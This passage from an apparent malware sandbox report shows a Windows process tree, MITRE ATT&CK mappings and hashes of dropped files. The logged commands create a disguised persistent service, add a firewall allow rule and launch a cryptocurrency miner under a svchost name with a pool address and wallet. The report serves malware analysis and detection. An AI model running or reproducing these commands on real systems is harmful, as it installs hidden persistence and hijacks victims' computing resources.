                                                                              • Suspicious use of SetThreadContext
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:988
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                • Modifies registry class
                                                                                PID:3592
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                2⤵
                                                                                • Drops file in System32 directory
                                                                                • Checks processor information in registry
                                                                                • Modifies data under HKEY_USERS
                                                                                • Modifies registry class
                                                                                PID:3988
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                              1⤵
                                                                              • Drops file in Windows directory
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:4376
                                                                            • C:\Windows\system32\browser_broker.exe
                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              PID:4560
                                                                            • C:\Windows\system32\msiexec.exe
                                                                              C:\Windows\system32\msiexec.exe /V
                                                                              1⤵
                                                                              • Enumerates connected drives
                                                                              • Drops file in Program Files directory
                                                                              • Drops file in Windows directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Modifies registry class
                                                                              PID:4724
                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 3A5C3F03E22B71111218BE0C3654C946 C
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                PID:6140
                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 08E74DADF4D564EA7CF535024EB8CD8D
                                                                                2⤵
                                                                                • Blocklisted process makes network request
                                                                                • Loads dropped DLL
                                                                                PID:6012
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                  3⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4836
                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 74460C1EB2C8C6541CA5A42DA96E1377 E Global\MSI0000
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                PID:5916
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5648
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies Internet Explorer settings
                                                                              • Modifies registry class
                                                                              PID:3856
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:4120
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:4680
                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                              1⤵
                                                                              • Modifies registry class
                                                                              PID:5576
                                                                            • C:\Users\Admin\AppData\Local\Temp\5485.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\5485.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetWindowsHookEx
                                                                              PID:5936
                                                                            • C:\Users\Admin\AppData\Local\Temp\5735.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\5735.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:2196
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fnapcrsa\
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:5328
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hjekdqa.exe" C:\Windows\SysWOW64\fnapcrsa\
                                                                                2⤵
                                                                                  PID:1300
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  "C:\Windows\System32\sc.exe" create fnapcrsa binPath= "C:\Windows\SysWOW64\fnapcrsa\hjekdqa.exe /d\"C:\Users\Admin\AppData\Local\Temp\5735.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                  2⤵
                                                                                    PID:4996
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    "C:\Windows\System32\sc.exe" description fnapcrsa "wifi internet conection"
                                                                                    2⤵
                                                                                      PID:4944
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      "C:\Windows\System32\sc.exe" start fnapcrsa
                                                                                      2⤵
                                                                                        PID:5680
                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                        2⤵
                                                                                          PID:3600
                                                                                      • C:\Users\Admin\AppData\Local\Temp\66D6.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\66D6.exe
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4508
                                                                                        • C:\Users\Admin\AppData\Local\Temp\66D6.exe
                                                                                          "{path}"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4740
                                                                                      • C:\Windows\SysWOW64\fnapcrsa\hjekdqa.exe
                                                                                        C:\Windows\SysWOW64\fnapcrsa\hjekdqa.exe /d"C:\Users\Admin\AppData\Local\Temp\5735.exe"
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5996
                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                          svchost.exe
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:1400
                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                            svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                            3⤵
                                                                                              PID:1004
                                                                                        • C:\Users\Admin\AppData\Local\Temp\6BF8.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\6BF8.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          PID:4356
                                                                                        • C:\Users\Admin\AppData\Local\Temp\6FC1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\6FC1.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3756
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7A80.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\7A80.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3848
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:5612
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                              PID:6000
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:5924
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:3940
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:4264
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                  PID:5508
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5096
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5808
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5468
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:4888
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 4888 -s 1592
                                                                                                        2⤵
                                                                                                        • Program crash
                                                                                                        PID:5132
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5708
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:488
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5052
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                          PID:1152
                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                            C:\Windows\system32\WerFault.exe -u -p 1152 -s 3140
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            • Checks processor information in registry
                                                                                                            • Enumerates system info in registry
                                                                                                            PID:5524

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                        Execution

                                                                                                        Scheduled Task

                                                                                                        1
                                                                                                        T1053

                                                                                                        Persistence

                                                                                                        New Service

                                                                                                        1
                                                                                                        T1050

                                                                                                        Modify Existing Service

                                                                                                        1
                                                                                                        T1031

                                                                                                        Registry Run Keys / Startup Folder

                                                                                                        2
                                                                                                        T1060

                                                                                                        Scheduled Task

                                                                                                        1
                                                                                                        T1053

                                                                                                        Privilege Escalation

                                                                                                        New Service

                                                                                                        1
                                                                                                        T1050

                                                                                                        Scheduled Task

                                                                                                        1
                                                                                                        T1053

                                                                                                        Defense Evasion

                                                                                                        Disabling Security Tools

                                                                                                        1
                                                                                                        T1089

                                                                                                        Modify Registry

                                                                                                        5
                                                                                                        T1112

                                                                                                        Install Root Certificate

                                                                                                        1
                                                                                                        T1130

                                                                                                        Credential Access

                                                                                                        Credentials in Files

                                                                                                        3
                                                                                                        T1081

                                                                                                        Discovery

                                                                                                        Software Discovery

                                                                                                        1
                                                                                                        T1518

                                                                                                        Query Registry

                                                                                                        6
                                                                                                        T1012

                                                                                                        System Information Discovery

                                                                                                        7
                                                                                                        T1082

                                                                                                        Peripheral Device Discovery

                                                                                                        2
                                                                                                        T1120

                                                                                                        Remote System Discovery

                                                                                                        1
                                                                                                        T1018

                                                                                                        Collection

                                                                                                        Data from Local System

                                                                                                        3
                                                                                                        T1005

                                                                                                        Command and Control

                                                                                                        Web Service

                                                                                                        1
                                                                                                        T1102

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                          MD5

                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                          SHA1

                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                          SHA256

                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                          SHA512

                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                        • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                          MD5

                                                                                                          7124be0b78b9f4976a9f78aaeaed893a

                                                                                                          SHA1

                                                                                                          804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                          SHA256

                                                                                                          bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                          SHA512

                                                                                                          49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                        • C:\Program Files\Windows NT\WKJZTNWKYN\ultramediaburner.exe
                                                                                                          MD5

                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                          SHA1

                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                          SHA256

                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                          SHA512

                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                        • C:\Program Files\Windows NT\WKJZTNWKYN\ultramediaburner.exe
                                                                                                          MD5

                                                                                                          6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                          SHA1

                                                                                                          938acc555933ee4887629048be4b11df76bb8de8

                                                                                                          SHA256

                                                                                                          b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                          SHA512

                                                                                                          a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                        • C:\Program Files\install.dat
                                                                                                          MD5

                                                                                                          806c3221a013fec9530762750556c332

                                                                                                          SHA1

                                                                                                          36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                          SHA256

                                                                                                          9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                          SHA512

                                                                                                          56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                        • C:\Program Files\install.dll
                                                                                                          MD5

                                                                                                          fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                          SHA1

                                                                                                          6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                          SHA256

                                                                                                          9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                          SHA512

                                                                                                          0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0yqdomnn.lcc\google-game.exe
                                                                                                          MD5

                                                                                                          cab488c5b9953c0b06545b75a07ea040

                                                                                                          SHA1

                                                                                                          284196fe7f37e7a69c340509e91edc6de713946d

                                                                                                          SHA256

                                                                                                          9f7d5cc40b9e89c3bd65fcd2064be2a02a064bca83696f5f529a7a8269b2cf09

                                                                                                          SHA512

                                                                                                          b98ae9c273ec4b512218d306b9fc73d46f1b39500fa9f2551d336b69521316db52dbc98ad87021cfe00a49f29dfd9b20a495f4f904b6ceaa61bd883f245c44f3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\0yqdomnn.lcc\google-game.exe
                                                                                                          MD5

                                                                                                          cab488c5b9953c0b06545b75a07ea040

                                                                                                          SHA1

                                                                                                          284196fe7f37e7a69c340509e91edc6de713946d

                                                                                                          SHA256

                                                                                                          9f7d5cc40b9e89c3bd65fcd2064be2a02a064bca83696f5f529a7a8269b2cf09

                                                                                                          SHA512

                                                                                                          b98ae9c273ec4b512218d306b9fc73d46f1b39500fa9f2551d336b69521316db52dbc98ad87021cfe00a49f29dfd9b20a495f4f904b6ceaa61bd883f245c44f3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1l4m0mbh.ug1\rasup.exe
                                                                                                          MD5

                                                                                                          390c30ce980f54cb86be178b6db32f30

                                                                                                          SHA1

                                                                                                          67b60733c99284bd51abb858896a7f0cca7a9761

                                                                                                          SHA256

                                                                                                          3ad6e3486ddef1168dc894872d11c1e922703867563d8b598b9b605b9dd63b33

                                                                                                          SHA512

                                                                                                          16455b2d4cea4e6a93a7a78a36b14e2a593cf76b2e627516a98aa6e09d5a3871dc45070538befff765b123c8fc1fa72dc7eceea31708864a4dfc41ac72e193d3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1l4m0mbh.ug1\rasup.exe
                                                                                                          MD5

                                                                                                          390c30ce980f54cb86be178b6db32f30

                                                                                                          SHA1

                                                                                                          67b60733c99284bd51abb858896a7f0cca7a9761

                                                                                                          SHA256

                                                                                                          3ad6e3486ddef1168dc894872d11c1e922703867563d8b598b9b605b9dd63b33

                                                                                                          SHA512

                                                                                                          16455b2d4cea4e6a93a7a78a36b14e2a593cf76b2e627516a98aa6e09d5a3871dc45070538befff765b123c8fc1fa72dc7eceea31708864a4dfc41ac72e193d3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6b-47531-55a-074a4-32c103402bee8\Fileshuzhyhu.exe
                                                                                                          MD5

                                                                                                          01c22a39e02f07e6edcce0984f760261

                                                                                                          SHA1

                                                                                                          536af89e33da303558dc9312ad449c0aa17b5938

                                                                                                          SHA256

                                                                                                          7fcd9711afcab0d2e3f78ac56199857024685be58067a835816c50b74fbc85df

                                                                                                          SHA512

                                                                                                          df38742183bb9a47afabd962e52c8cb329627725f4adef44019aafe74d97c717644923c8433717f202237e00f238be6cc2bbd19f8c4bdf357314650b1a5f3335

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6b-47531-55a-074a4-32c103402bee8\Fileshuzhyhu.exe
                                                                                                          MD5

                                                                                                          01c22a39e02f07e6edcce0984f760261

                                                                                                          SHA1

                                                                                                          536af89e33da303558dc9312ad449c0aa17b5938

                                                                                                          SHA256

                                                                                                          7fcd9711afcab0d2e3f78ac56199857024685be58067a835816c50b74fbc85df

                                                                                                          SHA512

                                                                                                          df38742183bb9a47afabd962e52c8cb329627725f4adef44019aafe74d97c717644923c8433717f202237e00f238be6cc2bbd19f8c4bdf357314650b1a5f3335

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6b-47531-55a-074a4-32c103402bee8\Fileshuzhyhu.exe.config
                                                                                                          MD5

                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                          SHA1

                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                          SHA256

                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                          SHA512

                                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\71-aa1ff-037-0a3b8-a2ca76c443205\Kenessey.txt
                                                                                                          MD5

                                                                                                          97384261b8bbf966df16e5ad509922db

                                                                                                          SHA1

                                                                                                          2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                          SHA256

                                                                                                          9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                          SHA512

                                                                                                          b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\71-aa1ff-037-0a3b8-a2ca76c443205\Puqakinaeno.exe
                                                                                                          MD5

                                                                                                          5b45c564cb09f7ef4ee87961c7e06b79

                                                                                                          SHA1

                                                                                                          28eb7392e137b75ec619dbc4f793c1b87f8b9088

                                                                                                          SHA256

                                                                                                          1fd7e6437188e7af9baaba03436912f2a4d138cf1e1d0603c3070e93ff6e55d5

                                                                                                          SHA512

                                                                                                          d522f0712aaf6293ef356321d7c93daa05b1c8b542c8df4bf0f478e9f534929092d3ec03f2a9cccfd3dfcbf943689a6e0d32148ef0dffa484d522f626064996e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\71-aa1ff-037-0a3b8-a2ca76c443205\Puqakinaeno.exe
                                                                                                          MD5

                                                                                                          5b45c564cb09f7ef4ee87961c7e06b79

                                                                                                          SHA1

                                                                                                          28eb7392e137b75ec619dbc4f793c1b87f8b9088

                                                                                                          SHA256

                                                                                                          1fd7e6437188e7af9baaba03436912f2a4d138cf1e1d0603c3070e93ff6e55d5

                                                                                                          SHA512

                                                                                                          d522f0712aaf6293ef356321d7c93daa05b1c8b542c8df4bf0f478e9f534929092d3ec03f2a9cccfd3dfcbf943689a6e0d32148ef0dffa484d522f626064996e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\71-aa1ff-037-0a3b8-a2ca76c443205\Puqakinaeno.exe.config
                                                                                                          MD5

                                                                                                          98d2687aec923f98c37f7cda8de0eb19

                                                                                                          SHA1

                                                                                                          f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                          SHA256

                                                                                                          8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                          SHA512

                                                                                                          95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MSI7717.tmp
                                                                                                          MD5

                                                                                                          0981d5c068a9c33f4e8110f81ffbb92e

                                                                                                          SHA1

                                                                                                          badb871adf6f24aba6923b9b21b211cea2aeca77

                                                                                                          SHA256

                                                                                                          b3f5e10fb1b7352a6dbbcbb10ed605a8fda24f3f9c31f954835bd5a41eb6ea68

                                                                                                          SHA512

                                                                                                          59cccdcde1964e61fa63078fde776eee91c462d7d3db308ada02e27e6ce584c41ad1f7970642e02ce331d805215a2cc868fb0512c01accfa70cda52e9329e1d8

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MSI8169.tmp
                                                                                                          MD5

                                                                                                          43d68e8389e7df33189d1c1a05a19ac8

                                                                                                          SHA1

                                                                                                          caf9cc610985e5cfdbae0c057233a6194ecbfed4

                                                                                                          SHA256

                                                                                                          85dc7518ad5aa46ef572f17050e3b004693784d1855cca9390da1143a64fceae

                                                                                                          SHA512

                                                                                                          58a76b4cb8f53cee73a8fc2afbd69388a1f2ea30ea3c0007beaa361cb0cc3d4d18c1fa8ccf036a2d2cf8fa07b01451000a704a626d95bd050afe6ba808e6de1e

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                          MD5

                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                          SHA1

                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                          SHA256

                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                          SHA512

                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                          MD5

                                                                                                          41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                          SHA1

                                                                                                          0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                          SHA256

                                                                                                          97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                          SHA512

                                                                                                          5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                          MD5

                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                          SHA1

                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                          SHA256

                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                          SHA512

                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                          MD5

                                                                                                          3b1b318df4d314a35dce9e8fd89e5121

                                                                                                          SHA1

                                                                                                          55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                          SHA256

                                                                                                          4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                          SHA512

                                                                                                          f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                          MD5

                                                                                                          3bc84c0e8831842f2ae263789217245d

                                                                                                          SHA1

                                                                                                          d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                          SHA256

                                                                                                          757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                          SHA512

                                                                                                          f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                                          MD5

                                                                                                          3bc84c0e8831842f2ae263789217245d

                                                                                                          SHA1

                                                                                                          d60b174c7f8372036da1eb0a955200b1bb244387

                                                                                                          SHA256

                                                                                                          757e7c2569cc52c9e1639fbca06e957cb40f775d5cb1a8aafa670131b62b0824

                                                                                                          SHA512

                                                                                                          f3117a6bd79db1d67dce2c67d539c56c177caed9f0b5b019dfb0034f28cb2e79e248893171c2ad78cbca358c2f5813edb17f0126ab40cfe08f9a6357f233f2e4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                          MD5

                                                                                                          25d9f83dc738b4894cf159c6a9754e40

                                                                                                          SHA1

                                                                                                          152a0e0a8319c8d6bfbe6ae71ae5dda5cba2caca

                                                                                                          SHA256

